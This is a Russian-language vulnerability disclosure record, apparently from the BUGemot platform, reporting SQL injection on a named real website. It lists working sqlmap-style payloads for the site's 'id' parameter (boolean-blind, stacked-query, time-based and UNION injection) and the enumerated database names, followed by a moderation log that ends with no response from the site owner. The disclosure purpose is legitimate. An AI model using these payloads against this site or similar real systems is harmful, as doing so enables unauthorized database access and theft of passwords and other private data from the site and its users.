Подробная информация
Есть SQL инъекции на сайте.
Используя эту слабость возможно краст конфиденциальной информации с сайта (пароли, структура сайта и т.д.)
site: ambiancemed.com
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=7 AND 9525=9525
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (comment)
    Payload: id=7;SELECT SLEEP(5)#
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=7 AND SLEEP(5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: id=-6345 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767071,0x68644a6f727a6a4f624959496e595a767646416e6f47615864685351415061656f6f784d55455870,0x716b626271),NULL,NULL-- lBeb
---
available databases [2]:
[*] apteyfpx_amqiance
[*] information_wchema
Записи
- 
									23 Январь 2017, 13:14 
 Статус уязвимости
 Нет ответа от источника
- 
									13 Декабрь 2016, 12:04 
 Статус уязвимости
 Отправлено сообщение об уязвимости на электронный адрес источника
- 
									13 Декабрь 2016, 11:15 
 Статус уязвимости
 Подтверждено со стороны модератора
- 
									13 Декабрь 2016, 11:01 
 Статус уязвимости
 Отправлено сообщение об уязвимости на электронный адрес источника
- 
									11 Декабрь 2016, 11:22 
 Уязвимости присвоен балл
 Модератор присвоил 8 баллов из 10-и на уязвимости
- 
									11 Декабрь 2016, 11:10 
 Статус уязвимости
 Подтверждено со стороны модератора
- 
									08 Декабрь 2016, 16:25 
 Уязвимость изменена
 Уязвимость изменена
- 
									08 Декабрь 2016, 12:17 
 Уязвимость отказана
 Saytın ünvanını qeyd edin
- 
									07 Декабрь 2016, 23:18 
 Добавлена уязвимость
 Добавлена уязвимость на BUGemot
